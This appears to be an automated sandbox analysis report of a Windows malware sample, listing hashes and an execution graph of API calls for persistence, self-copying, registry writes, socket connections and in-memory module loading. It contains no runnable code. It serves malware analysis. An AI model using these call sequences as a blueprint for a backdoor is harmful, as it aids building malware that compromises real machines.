                                                                                              • Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                                                                              • Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
                                                                                              • Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                                                                              • Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadwsprintf
                                                                                              • String ID: hra%u.dll
                                                                                              • API String ID: 2341783205-640331709
                                                                                              • Opcode ID: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                                                                              • Instruction ID: 9e1dc9a3bb07ee0ff9ba8cfb77d47e9a35d0c50c1dd6ee90f04faac7d43bcb07
                                                                                              • Opcode Fuzzy Hash: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                                                                              • Instruction Fuzzy Hash: 2DD0A7F494020D67CB1097B4EE4EFC533AC5B14704F000170B746F20D0EAF4D1C88A99

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.3%
                                                                                              Dynamic/Decrypted Code Coverage:53.1%
                                                                                              Signature Coverage:11.5%
                                                                                              Total number of Nodes:716
                                                                                              Total number of Limit Nodes:38
                                                                                              execution_graph 19423 10002ab0 CreateThread CloseHandle 19444 10009720 ??2@YAPAXI FindResourceA LoadResource LockResource 19423->19444 19455 100022f0 19423->19455 19425 10002aea 19426 10002af7 19425->19426 19427 10002b5a 19425->19427 19448 10012620 CreateToolhelp32Snapshot ??2@YAPAXI Process32First 19426->19448 19428 10009720 5 API calls 19427->19428 19430 10002b6b 19428->19430 19432 10002b76 GetModuleFileNameA GetWindowsDirectoryA lstrcat 19430->19432 19441 10002bf7 19430->19441 19431 10002b01 19433 10002b23 19431->19433 19434 10002b08 CreateThread CloseHandle Sleep 19431->19434 19436 10009720 5 API calls 19432->19436 19435 10012620 7 API calls 19433->19435 19434->19433 19532 10002820 GetModuleHandleA LoadIconA LoadCursorA RegisterClassExA CreateWindowExA 19434->19532 19437 10002b2d 19435->19437 19438 10002bcd lstrcat lstrcat MoveFileA 19436->19438 19439 10002b41 CreateThread CloseHandle 19437->19439 19440 10002b34 WinExec 19437->19440 19438->19441 19439->19441 19508 10002930 GetModuleFileNameA GetWindowsDirectoryA lstrcat 19439->19508 19440->19439 19442 10002c1d Sleep 19441->19442 19443 10002c09 CreateThread CloseHandle 19441->19443 19442->19442 19443->19442 19517 10001a20 GetSystemDirectoryA wsprintfA 19443->19517 19445 1000977b 19444->19445 19446 10009792 19445->19446 19447 10009783 ??3@YAXPAX 19445->19447 19446->19425 19447->19425 19449 1001268f 19448->19449 19450 1001264f _strcmpi 19448->19450 19449->19431 19451 10012665 19450->19451 19452 1001266d Process32Next 19450->19452 19451->19431 19452->19449 19453 10012678 lstrcmpiA 19452->19453 19453->19451 19454 10012684 Process32Next 19453->19454 19454->19449 19454->19453 19456 1000230f 19455->19456 19457 10009720 5 API calls 19456->19457 19458 10002322 19457->19458 19459 10009720 5 API calls 19458->19459 19460 10002335 19459->19460 19461 10009720 5 API calls 19460->19461 19462 10002348 19461->19462 19463 10002360 sprintf CreateMutexA GetLastError 19462->19463 19466 10002359 19462->19466 19464 100023b1 CloseHandle ExitProcess 19463->19464 19465 100023bf 6 API calls 19463->19465 19467 10002438 SetProcessWindowStation 19465->19467 19468 1000243f SetErrorMode 19465->19468 19467->19468 19538 10003780 19468->19538 19470 10002458 19471 10009720 5 API calls 19470->19471 19472 10002470 19471->19472 19473 10002477 19472->19473 19484 100024b0 19472->19484 19584 1000c4f0 19473->19584 19477 100024ca OpenEventA 19479 100024e5 Sleep 19477->19479 19501 100024c8 19477->19501 19479->19477 19479->19501 19480 10009720 ??2@YAPAXI FindResourceA LoadResource LockResource ??3@YAXPAX 19480->19484 19483 1000251d ??3@YAXPAX 19483->19484 19484->19480 19484->19483 19486 10001160 malloc realloc 19484->19486 19487 100011b0 lstrlen ??2@YAPAXI strchr strchr atoi 19484->19487 19488 10002627 GetTickCount 19484->19488 19489 10002614 ??3@YAXPAX 19484->19489 19491 100025c3 ??3@YAXPAX 19484->19491 19492 10002669 GetTickCount 19484->19492 19493 10002572 ??3@YAXPAX 19484->19493 19496 100026e0 Sleep 19484->19496 19497 10002716 GetTickCount 19484->19497 19499 10002718 OpenEventA WaitForSingleObject Sleep 19484->19499 19484->19501 19575 1000c450 19484->19575 19485 100024fd CloseHandle 19485->19484 19486->19484 19487->19484 19547 10003940 19488->19547 19489->19484 19491->19484 19560 10001600 GetVersionExA 19492->19560 19493->19484 19496->19484 19497->19499 19498 1000c660 3 API calls 19498->19501 19499->19484 19500 10002752 19499->19500 19597 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19500->19597 19501->19477 19501->19484 19501->19498 19596 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19501->19596 19503 1000275b CloseHandle 19504 1000c660 3 API calls 19503->19504 19505 10002778 SetErrorMode ReleaseMutex CloseHandle 19504->19505 19598 10003880 WaitForSingleObject 19505->19598 19509 10009720 5 API calls 19508->19509 19510 10002991 lstrcat CreateDirectoryA Sleep wsprintfA lstrcat 19509->19510 19511 10009720 5 API calls 19510->19511 19512 10002a09 19511->19512 19513 10002a10 MoveFileA 19512->19513 19514 10002a23 CopyFileA wsprintfA lstrlen 19512->19514 19513->19514 19759 1000dda0 19514->19759 19776 100018a0 CreateToolhelp32Snapshot 19517->19776 19519 10001a97 19520 10001ac2 Sleep FindFirstFileA 19519->19520 19521 10001a9b CreateFileA CloseHandle 19519->19521 19522 10001af8 GetCurrentDirectoryA strstr 19520->19522 19523 10001aea 19520->19523 19521->19520 19524 10001b40 19522->19524 19525 10001b4e Sleep GetVersionExA GetSystemDefaultLCID 19522->19525 19526 10001bdd 32 API calls 19525->19526 19527 10001b7e 19525->19527 19527->19526 19529 10012620 7 API calls 19527->19529 19530 10001bcf 19529->19530 19530->19526 19531 10001bd6 Sleep 19530->19531 19531->19526 19533 100028c0 ShowWindow UpdateWindow GetMessageA 19532->19533 19534 1000291c 19532->19534 19533->19534 19535 100028e7 19533->19535 19536 100028f4 TranslateMessage DispatchMessageA GetMessageA 19535->19536 19536->19536 19537 10002913 19536->19537 19610 100033d0 RtlInitializeCriticalSection 19538->19610 19540 100037aa 19611 100033d0 RtlInitializeCriticalSection 19540->19611 19542 100037bd 19612 100033d0 RtlInitializeCriticalSection 19542->19612 19544 100037cd 19613 100033d0 RtlInitializeCriticalSection 19544->19613 19546 100037dd WSAStartup CreateEventA 19546->19470 19614 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19547->19614 19549 1000394c ResetEvent socket 19550 10003981 gethostbyname 19549->19550 19551 10003977 19549->19551 19552 10003992 19550->19552 19553 1000399c htons connect 19550->19553 19551->19484 19552->19484 19554 100039e1 setsockopt 19553->19554 19555 100039d7 19553->19555 19556 10003a05 WSAIoctl 19554->19556 19557 10003a3f 19554->19557 19555->19484 19556->19557 19615 100126a0 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 19557->19615 19559 10003a5b 19559->19484 19616 100012e0 wsprintfA 19560->19616 19562 10001644 getsockname 19621 10001240 RegOpenKeyA RegQueryValueExA RegCloseKey 19562->19621 19564 100016a4 GetSystemInfo 19622 100012a0 19564->19622 19567 10009720 5 API calls 19568 1000170c 19567->19568 19626 10001160 19568->19626 19570 10001715 19629 100014b0 19570->19629 19572 1000174b 19639 10003e30 19572->19639 19574 1000175f 19574->19484 19749 1000d1d0 19575->19749 19577 1000c45e 19578 1000c472 lstrcpy 19577->19578 19579 1000c479 19577->19579 19578->19579 19580 1000c481 lstrcpy 19579->19580 19581 1000c48b 19579->19581 19580->19581 19582 1000c493 lstrcpy 19581->19582 19583 1000c49b 19581->19583 19582->19583 19583->19484 19585 1000d1d0 CreateEventA 19584->19585 19586 10002488 19585->19586 19587 1000c520 19586->19587 19753 100126a0 CreateEventA _beginthreadex WaitForSingleObject CloseHandle 19587->19753 19589 1000249c 19590 1000c660 19589->19590 19591 1000c6a2 19590->19591 19592 1000c676 19590->19592 19754 1000d220 CloseHandle 19591->19754 19593 1000c684 TerminateThread CloseHandle 19592->19593 19593->19591 19593->19593 19595 1000c6ab 19595->19484 19596->19485 19597->19503 19599 100038d2 CloseHandle CloseHandle WSACleanup 19598->19599 19600 100038cb 19598->19600 19756 10003420 19599->19756 19755 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19600->19755 19603 100038fd 19604 10003420 2 API calls 19603->19604 19605 1000390a 19604->19605 19606 10003420 2 API calls 19605->19606 19607 10003917 19606->19607 19608 10003420 2 API calls 19607->19608 19609 100027a0 19608->19609 19609->19466 19610->19540 19611->19542 19612->19544 19613->19546 19614->19549 19615->19559 19669 1000d900 RegOpenKeyExA 19616->19669 19618 1000134c lstrlen 19619 10001364 lstrlen 19618->19619 19620 1000135c gethostname 19618->19620 19619->19562 19620->19619 19621->19564 19623 100012ab 19622->19623 19624 100012ce GlobalMemoryStatus 19623->19624 19625 100012af 6CC61E00 19623->19625 19624->19567 19625->19623 19625->19624 19703 10001000 malloc 19626->19703 19628 10001179 19628->19570 19630 10009720 5 API calls 19629->19630 19631 100014ca GetSystemDirectoryA FindFirstFileA 19630->19631 19632 10001551 19631->19632 19633 10001556 CreateFileA ReadFile 19631->19633 19707 10001380 19632->19707 19634 100015ba CloseHandle wsprintfA lstrlen 19633->19634 19635 100015af wsprintfA 19633->19635 19637 100015e7 lstrlen 19634->19637 19638 100015dc wsprintfA 19634->19638 19635->19634 19637->19572 19638->19637 19714 10003740 RtlEnterCriticalSection 19639->19714 19641 10003e47 19642 10003e53 _ftol ??2@YAPAXI 19641->19642 19643 10003f84 19641->19643 19644 10003e87 19642->19644 19646 10003e91 19642->19646 19645 10003450 7 API calls 19643->19645 19644->19574 19647 10003f94 19645->19647 19649 10003ec3 19646->19649 19650 10003ead ??3@YAXPAX 19646->19650 19648 10003740 6 API calls 19647->19648 19651 10003f9e 19648->19651 19724 10003450 RtlEnterCriticalSection 19649->19724 19650->19574 19652 10003450 7 API calls 19651->19652 19657 10003f58 19652->19657 19654 10003ede 19655 10003450 7 API calls 19654->19655 19656 10003eec 19655->19656 19658 10003450 7 API calls 19656->19658 19717 10003fb0 19657->19717 19659 10003efa 19658->19659 19660 10003450 7 API calls 19659->19660 19662 10003f07 ??3@YAXPAX ??2@YAPAXI 19660->19662 19664 10003740 6 API calls 19662->19664 19665 10003f3e 19664->19665 19666 10003450 7 API calls 19665->19666 19667 10003f4b 19666->19667 19667->19657 19668 10003f4f ??3@YAXPAX 19667->19668 19668->19657 19670 1000d976 19669->19670 19671 1000d99d 19669->19671 19697 1000dd1f RegCloseKey RegCloseKey 19670->19697 19675 1000db42 RegEnumKeyExA 19671->19675 19676 1000dd02 lstrcat 19671->19676 19677 1000d9c4 RegQueryValueExA 19671->19677 19678 1000dccb wsprintfA 19671->19678 19679 1000da07 RegQueryValueExA 19671->19679 19680 1000daca RegQueryValueExA 19671->19680 19681 1000db11 RegQueryValueExA 19671->19681 19682 1000dc6a wsprintfA 19671->19682 19683 1000dbde RegEnumValueA 19671->19683 19684 1000dc9e wsprintfA 19671->19684 19689 1000d9b0 19671->19689 19695 1000da00 19671->19695 19673 1000d989 19673->19618 19685 1000db8a wsprintfA 19675->19685 19675->19695 19676->19618 19690 1000d9f4 19677->19690 19677->19695 19678->19676 19691 1000da33 19679->19691 19679->19695 19693 1000daf6 wsprintfA 19680->19693 19680->19695 19681->19695 19682->19676 19686 1000dc56 19683->19686 19683->19695 19684->19676 19685->19675 19686->19676 19686->19678 19686->19682 19686->19684 19689->19676 19689->19677 19689->19678 19689->19679 19689->19680 19689->19681 19689->19682 19689->19684 19689->19695 19698 1000d8d0 19690->19698 19691->19695 19696 1000da4d strncat strncat strchr 19691->19696 19692 1000dab6 19692->19618 19693->19695 19702 1000dd1f RegCloseKey RegCloseKey 19695->19702 19696->19691 19697->19673 19699 1000d8e2 _strnicmp 19698->19699 19700 1000d8f3 19699->19700 19701 1000d8f7 19699->19701 19700->19699 19701->19695 19702->19692 19704 10001107 realloc 19703->19704 19706 10001037 19703->19706 19704->19628 19705 100010fe 19705->19628 19706->19704 19706->19705 19708 10009720 5 API calls 19707->19708 19709 1000139a 19708->19709 19710 10001160 2 API calls 19709->19710 19711 100013a3 wsprintfA 19710->19711 19712 10009720 5 API calls 19711->19712 19713 100013d7 GetSystemDirectoryA CreateFileA WriteFile CloseHandle 19712->19713 19713->19633 19730 10003670 19714->19730 19716 10003760 RtlLeaveCriticalSection 19716->19641 19718 1000401a 19717->19718 19719 10003fce 19717->19719 19721 10004020 send 19718->19721 19722 10003f7a 19718->19722 19720 10003fd6 send 19719->19720 19719->19722 19723 10004000 Sleep 19719->19723 19720->19719 19721->19718 19721->19722 19722->19574 19723->19718 19723->19719 19725 1000346b 19724->19725 19741 100035a0 19725->19741 19727 10003479 19728 1000348e RtlLeaveCriticalSection 19727->19728 19729 1000347e RtlLeaveCriticalSection 19727->19729 19728->19654 19729->19654 19731 1000367c 19730->19731 19732 10003684 19731->19732 19733 1000368e ceil _ftol 19731->19733 19732->19716 19734 100036c4 19733->19734 19735 100036d2 VirtualAlloc 19734->19735 19736 100036c8 19734->19736 19739 10003590 19735->19739 19736->19716 19740 10003597 VirtualFree 19739->19740 19740->19716 19742 100035ad 19741->19742 19743 100035c0 ceil _ftol VirtualAlloc 19742->19743 19744 100035b5 19742->19744 19745 10003615 19743->19745 19746 10003609 19743->19746 19744->19727 19747 1000363c VirtualFree 19745->19747 19748 1000364e 19745->19748 19746->19727 19747->19748 19748->19727 19752 10004060 19749->19752 19751 1000d1e6 CreateEventA 19751->19577 19752->19751 19753->19589 19754->19595 19755->19599 19757 10003430 VirtualFree 19756->19757 19758 1000343e RtlDeleteCriticalSection 19756->19758 19757->19758 19758->19603 19760 1000ddd7 19759->19760 19761 1000de5b 19759->19761 19762 1000de05 RegOpenKeyExA 19760->19762 19763 1000de86 RegOpenKeyExA 19760->19763 19764 1000deb6 RegOpenKeyExA 19760->19764 19765 1000ddde RegCreateKeyExA 19760->19765 19775 1000df0b RegCloseKey RegCloseKey 19761->19775 19762->19761 19770 1000de25 19762->19770 19763->19761 19767 1000dea2 RegDeleteKeyA 19763->19767 19764->19761 19768 1000ded2 RegDeleteValueA 19764->19768 19765->19761 19765->19762 19767->19761 19771 1000deb4 19767->19771 19768->19761 19769 10002a77 Sleep FindWindowA PostMessageA 19770->19761 19772 1000de60 RegSetValueExA 19770->19772 19773 1000de35 19770->19773 19771->19761 19772->19761 19773->19761 19774 1000de3e RegSetValueExA 19773->19774 19774->19761 19775->19769 19777 100018f1 Process32First 19776->19777 19778 10001a07 19776->19778 19779 10001a00 CloseHandle 19777->19779 19784 1000190c GetCurrentProcessId 19777->19784 19778->19519 19779->19778 19781 10001924 OpenProcess 19781->19778 19783 10001940 GetModuleFileNameExA 19781->19783 19782 100019dc Process32Next 19782->19779 19782->19784 19783->19778 19785 1000195d _strcmpi 19783->19785 19784->19781 19784->19782 19786 100019f0 19785->19786 19787 100019d1 CloseHandle 19785->19787 19786->19519 19787->19782 19788 10003a70 19789 10003a7a 19788->19789 19790 10003aac select 19789->19790 19793 10003add recv 19789->19793 19795 10003b23 19789->19795 19796 10003b70 19789->19796 19790->19789 19791 10003b33 19790->19791 19820 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19791->19820 19793->19789 19793->19791 19797 10003ba4 19796->19797 19798 10003bbc 19796->19798 19821 10003db0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 19797->19821 19800 10003c03 19798->19800 19803 10003bd2 19798->19803 19801 10003450 7 API calls 19800->19801 19818 10003c12 19801->19818 19802 10003ba9 19802->19789 19804 10003e30 22 API calls 19803->19804 19805 10003bf0 19804->19805 19805->19789 19806 10003c49 _CxxThrowException 19806->19818 19808 10003cb3 ??2@YAPAXI ??2@YAPAXI 19809 10003d75 _CxxThrowException 19808->19809 19808->19818 19810 10003740 6 API calls 19809->19810 19812 10003d95 19810->19812 19811 100034d0 8 API calls 19811->19818 19813 10003e30 22 API calls 19812->19813 19814 10003da0 19813->19814 19814->19789 19815 10003d60 _CxxThrowException 19815->19809 19816 10003740 6 API calls 19816->19818 19817 10003450 7 API calls 19817->19818 19818->19802 19818->19806 19818->19809 19818->19811 19818->19815 19818->19816 19818->19817 19819 10003d46 ??3@YAXPAX ??3@YAXPAX 19818->19819 19822 100034d0 RtlEnterCriticalSection 19818->19822 19819->19818 19820->19795 19821->19802 19823 100034eb 19822->19823 19824 100034f3 RtlLeaveCriticalSection 19823->19824 19825 10003503 19823->19825 19824->19808 19826 1000355b 19825->19826 19827 1000353d memmove 19825->19827 19828 10003670 4 API calls 19826->19828 19827->19826 19829 1000356a RtlLeaveCriticalSection 19828->19829 19829->19808 19830 10003670 19831 1000367c 19830->19831 19832 10003684 19831->19832 19833 1000368e ceil _ftol 19831->19833 19834 100036c4 19833->19834 19835 100036d2 VirtualAlloc 19834->19835 19836 100036c8 19834->19836 19837 10003590 19835->19837 19838 100036f1 VirtualFree 19837->19838 19839 10015e40 calloc 19840 401a39 GetVersion 19865 402f1c HeapCreate 19840->19865 19842 401a98 19843 401aa5 19842->19843 19844 401a9d 19842->19844 19877 403a7d 19843->19877 19947 401b54 19844->19947 19848 401aad GetCommandLineA 19891 40394b 19848->19891 19852 401ac7 19923 403645 19852->19923 19854 401acc 19855 401ad1 GetStartupInfoA 19854->19855 19936 4035ed 19855->19936 19857 401ae3 GetModuleHandleA 19940 401630 GetVersionExA 19857->19940 19866 402f72 19865->19866 19867 402f3c 19865->19867 19866->19842 19960 402dd4 19867->19960 19870 402f58 19873 402f75 19870->19873 19974 4026bf 19870->19974 19871 402f4b 19972 401b78 HeapAlloc 19871->19972 19873->19842 19875 402f55 19875->19873 19876 402f66 HeapDestroy 19875->19876 19876->19866 20037 4032b5 19877->20037 19880 403a9c GetStartupInfoA 19888 403bad 19880->19888 19890 403ae8 19880->19890 19883 403c14 SetHandleCount 19883->19848 19884 403bd4 GetStdHandle 19886 403be2 GetFileType 19884->19886 19884->19888 19885 4032b5 12 API calls 19885->19890 19886->19888 19887 403b59 19887->19888 19889 403b7b GetFileType 19887->19889 19888->19883 19888->19884 19889->19887 19890->19885 19890->19887 19890->19888 19892 403966 GetEnvironmentStringsW 19891->19892 19893 403999 19891->19893 19894 40397a GetEnvironmentStrings 19892->19894 19895 40396e 19892->19895 19893->19895 19896 40398a 19893->19896 19894->19896 19901 401abd 19894->19901 19897 4039a6 GetEnvironmentStringsW 19895->19897 19900 4039b2 19895->19900 19898 403a2c GetEnvironmentStrings 19896->19898 19896->19901 19902 403a38 19896->19902 19897->19900 19897->19901 19898->19901 19898->19902 19899 4039c7 WideCharToMultiByte 19903 4039e6 19899->19903 19904 403a18 FreeEnvironmentStringsW 19899->19904 19900->19899 19900->19900 19914 4036fe 19901->19914 19905 4032b5 12 API calls 19902->19905 19906 4032b5 12 API calls 19903->19906 19904->19901 19912 403a53 19905->19912 19907 4039ec 19906->19907 19907->19904 19908 4039f5 WideCharToMultiByte 19907->19908 19910 403a0f 19908->19910 19911 403a06 19908->19911 19909 403a69 FreeEnvironmentStringsA 19909->19901 19910->19904 20103 4019d0 19911->20103 19912->19909 19915 403710 19914->19915 19916 403715 GetModuleFileNameA 19914->19916 20133 404b15 19915->20133 19918 403738 19916->19918 19919 4032b5 12 API calls 19918->19919 19920 403759 19919->19920 19921 403769 19920->19921 19922 401b2f 7 API calls 19920->19922 19921->19852 19922->19921 19924 403652 19923->19924 19927 403657 19923->19927 19925 404b15 19 API calls 19924->19925 19925->19927 19926 4032b5 12 API calls 19928 403684 19926->19928 19927->19926 19929 401b2f 7 API calls 19928->19929 19933 403698 19928->19933 19929->19933 19930 4036db 19931 4019d0 7 API calls 19930->19931 19932 4036e7 19931->19932 19932->19854 19933->19930 19934 4032b5 12 API calls 19933->19934 19935 401b2f 7 API calls 19933->19935 19934->19933 19935->19933 19937 4035f6 19936->19937 19939 4035fb 19936->19939 19938 404b15 19 API calls 19937->19938 19938->19939 19939->19857 19941 4016f9 19940->19941 19942 40165d GetWindowsDirectoryA wsprintfA 19940->19942 20157 4015e0 19941->20157 19942->19941 19943 4016df GetFileAttributesA 19942->19943 19943->19941 19945 4016f1 ExitProcess 19943->19945 19948 401b62 19947->19948 19949 401b5d 19947->19949 19951 403e31 7 API calls 19948->19951 19950 403df8 7 API calls 19949->19950 19950->19948 19952 401b6b ExitProcess 19951->19952 19953 403394 20244 4033b6 19953->20244 19956 403469 19957 403475 19956->19957 19958 40359e UnhandledExceptionFilter 19957->19958 19959 401b21 19957->19959 19958->19959 19983 4046e0 19960->19983 19962 402de1 GetVersionExA 19963 402e17 GetEnvironmentVariableA 19962->19963 19964 402dfd 19962->19964 19967 402e36 19963->19967 19971 402ef4 19963->19971 19964->19963 19965 402e0f 19964->19965 19965->19870 19965->19871 19968 402e7b GetModuleFileNameA 19967->19968 19969 402e73 19967->19969 19968->19969 19969->19971 19985 404328 19969->19985 19971->19965 19988 402da7 GetModuleHandleA 19971->19988 19973 401b94 19972->19973 19973->19875 19975 4026d3 HeapAlloc 19974->19975 19976 4026cc 19974->19976 19977 4026f0 VirtualAlloc 19975->19977 19982 402728 19975->19982 19976->19977 19978 402710 VirtualAlloc 19977->19978 19979 4027e5 19977->19979 19980 4027d7 VirtualFree 19978->19980 19978->19982 19981 4027ed HeapFree 19979->19981 19979->19982 19980->19979 19981->19982 19982->19875 19982->19982 19984 4046ec 19983->19984 19984->19962 19984->19984 19990 40433f 19985->19990 19989 402dbe 19988->19989 19989->19965 19992 404357 19990->19992 19994 404387 19992->19994 19997 404f0a 19992->19997 19993 404f0a 6 API calls 19993->19994 19994->19993 19996 40433b 19994->19996 20001 404e3e 19994->20001 19996->19971 19998 404f1c 19997->19998 19999 404f28 19997->19999 19998->19992 20007 4051ce 19999->20007 20002 404e69 20001->20002 20005 404e4c 20001->20005 20003 404f0a 6 API calls 20002->20003 20004 404e85 20002->20004 20003->20004 20004->20005 20019 404f7f 20004->20019 20005->19994 20008 405217 20007->20008 20009 4051ff GetStringTypeW 20007->20009 20010 405242 GetStringTypeA 20008->20010 20011 405266 20008->20011 20009->20008 20012 40521b GetStringTypeA 20009->20012 20013 405303 20010->20013 20011->20013 20015 40527c MultiByteToWideChar 20011->20015 20012->20008 20012->20013 20013->19998 20015->20013 20016 4052a0 20015->20016 20016->20013 20017 4052da MultiByteToWideChar 20016->20017 20017->20013 20018 4052f3 GetStringTypeW 20017->20018 20018->20013 20020 404fcb 20019->20020 20021 404faf LCMapStringW 20019->20021 20024 405031 20020->20024 20025 405014 LCMapStringA 20020->20025 20021->20020 20022 404fd3 LCMapStringA 20021->20022 20022->20020 20023 40510d 20022->20023 20023->20005 20024->20023 20026 405047 MultiByteToWideChar 20024->20026 20025->20023 20026->20023 20027 405071 20026->20027 20027->20023 20028 4050a7 MultiByteToWideChar 20027->20028 20028->20023 20029 4050c0 LCMapStringW 20028->20029 20029->20023 20030 4050db 20029->20030 20031 4050e1 20030->20031 20033 405121 20030->20033 20031->20023 20032 4050ef LCMapStringW 20031->20032 20032->20023 20033->20023 20034 405159 LCMapStringW 20033->20034 20034->20023 20035 405171 WideCharToMultiByte 20034->20035 20035->20023 20046 4032c7 20037->20046 20040 401b2f 20041 401b38 20040->20041 20042 401b3d 20040->20042 20083 403df8 20041->20083 20089 403e31 20042->20089 20048 4032c4 20046->20048 20049 4032ce 20046->20049 20048->19880 20048->20040 20049->20048 20050 4032f3 20049->20050 20051 403302 20050->20051 20053 403317 20050->20053 20058 403310 20051->20058 20059 401f14 20051->20059 20054 403356 HeapAlloc 20053->20054 20053->20058 20065 4029b7 20053->20065 20055 403365 20054->20055 20055->20049 20056 403315 20056->20049 20058->20054 20058->20055 20058->20056 20060 401f46 20059->20060 20061 401fe5 20060->20061 20063 401ff4 20060->20063 20072 40221d 20060->20072 20061->20063 20079 4022ce 20061->20079 20063->20058 20068 4029c5 20065->20068 20066 402ab1 VirtualAlloc 20071 402a82 20066->20071 20067 402b86 20069 4026bf 5 API calls 20067->20069 20068->20066 20068->20067 20068->20071 20069->20071 20071->20058 20073 402260 HeapAlloc 20072->20073 20074 402230 HeapReAlloc 20072->20074 20076 402286 VirtualAlloc 20073->20076 20078 4022b0 20073->20078 20075 40224f 20074->20075 20074->20078 20075->20073 20077 4022a0 HeapFree 20076->20077 20076->20078 20077->20078 20078->20061 20080 4022e0 20079->20080 20080->20080 20081 40230a VirtualAlloc 20080->20081 20082 402329 20081->20082 20082->20063 20085 403e02 20083->20085 20084 403e2f 20084->20042 20085->20084 20086 403e31 7 API calls 20085->20086 20087 403e19 20086->20087 20088 403e31 7 API calls 20087->20088 20088->20084 20090 403e44 20089->20090 20091 403f5b 20090->20091 20092 403e84 20090->20092 20097 401b46 20090->20097 20094 403f6e GetStdHandle WriteFile 20091->20094 20093 403e90 GetModuleFileNameA 20092->20093 20092->20097 20095 403ea8 20093->20095 20094->20097 20098 404cab 20095->20098 20097->19880 20099 404cb8 LoadLibraryA 20098->20099 20100 404cfa 20098->20100 20099->20100 20101 404cc9 GetProcAddress 20099->20101 20100->20097 20101->20100 20102 404ce0 GetProcAddress GetProcAddress 20101->20102 20102->20100 20104 4019f8 20103->20104 20105 4019dc 20103->20105 20104->19910 20106 4019e6 20105->20106 20107 4019fc 20105->20107 20109 401a28 HeapFree 20106->20109 20110 4019f2 20106->20110 20108 401a27 20107->20108 20111 401a16 20107->20111 20108->20109 20109->20104 20114 401beb 20110->20114 20120 402972 20111->20120 20115 401c29 20114->20115 20119 401edf 20114->20119 20116 401e25 VirtualFree 20115->20116 20115->20119 20117 401e89 20116->20117 20118 401e98 VirtualFree HeapFree 20117->20118 20117->20119 20118->20119 20119->20104 20121 4029b5 20120->20121 20122 40299f 20120->20122 20121->20104 20122->20121 20124 402859 20122->20124 20127 402866 20124->20127 20125 402916 20125->20121 20126 402887 VirtualFree 20126->20127 20127->20125 20127->20126 20129 402803 VirtualFree 20127->20129 20130 402820 20129->20130 20131 402850 20130->20131 20132 402830 HeapFree 20130->20132 20131->20127 20132->20127 20134 404b25 20133->20134 20135 404b1e 20133->20135 20134->19916 20137 404751 20135->20137 20144 4048ea 20137->20144 20139 4048de 20139->20134 20142 404794 GetCPInfo 20143 4047a8 20142->20143 20143->20139 20149 404990 GetCPInfo 20143->20149 20145 40490a 20144->20145 20146 4048fa GetOEMCP 20144->20146 20147 40490f GetACP 20145->20147 20148 404762 20145->20148 20146->20145 20147->20148 20148->20139 20148->20142 20148->20143 20152 4049b3 20149->20152 20156 404a7b 20149->20156 20150 4051ce 6 API calls 20151 404a2f 20150->20151 20153 404f7f 9 API calls 20151->20153 20152->20150 20154 404a53 20153->20154 20155 404f7f 9 API calls 20154->20155 20155->20156 20156->20139 20158 4015f5 20157->20158 20165 401000 20158->20165 20160 4015ff 20161 401622 20160->20161 20184 401480 20160->20184 20161->19953 20166 401010 20165->20166 20167 401018 20165->20167 20166->20160 20168 401031 VirtualAlloc 20167->20168 20169 401029 20167->20169 20170 401068 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc 20168->20170 20171 40104e VirtualAlloc 20168->20171 20169->20160 20197 401150 20170->20197 20171->20170 20172 401062 20171->20172 20172->20160 20174 4010db 20202 401360 20174->20202 20176 4010f7 20177 40111d 20176->20177 20213 401220 20176->20213 20179 401520 11 API calls 20177->20179 20182 401132 20177->20182 20181 401127 20179->20181 20181->20160 20182->20160 20185 40149b 20184->20185 20187 4014e8 20184->20187 20185->20187 20240 405330 20185->20240 20188 401520 20187->20188 20189 4015ad 20188->20189 20194 40152d 20188->20194 20189->20161 20190 401584 20191 40159d GetProcessHeap HeapFree 20190->20191 20192 40158f VirtualFree 20190->20192 20191->20189 20192->20191 20193 40157a 20195 4019d0 7 API calls 20193->20195 20194->20190 20194->20193 20196 40156f FreeLibrary 20194->20196 20195->20190 20196->20194 20198 40120f 20197->20198 20199 401179 20197->20199 20198->20174 20199->20198 20200 4011bb VirtualAlloc 20199->20200 20201 40118e VirtualAlloc 20199->20201 20200->20199 20201->20199 20203 401383 IsBadReadPtr 20202->20203 20204 40145e 20202->20204 20203->20204 20205 40139c 20203->20205 20204->20176 20206 401466 20205->20206 20207 4013a7 LoadLibraryA 20205->20207 20206->20176 20208 401456 20207->20208 20211 4013bb 20207->20211 20208->20176 20210 401431 IsBadReadPtr 20210->20206 20210->20211 20211->20205 20211->20208 20211->20210 20212 401416 GetProcAddress 20211->20212 20219 401730 20211->20219 20212->20208 20212->20211 20214 40123f 20213->20214 20216 401104 20213->20216 20215 401262 VirtualFree 20214->20215 20214->20216 20217 4012ae 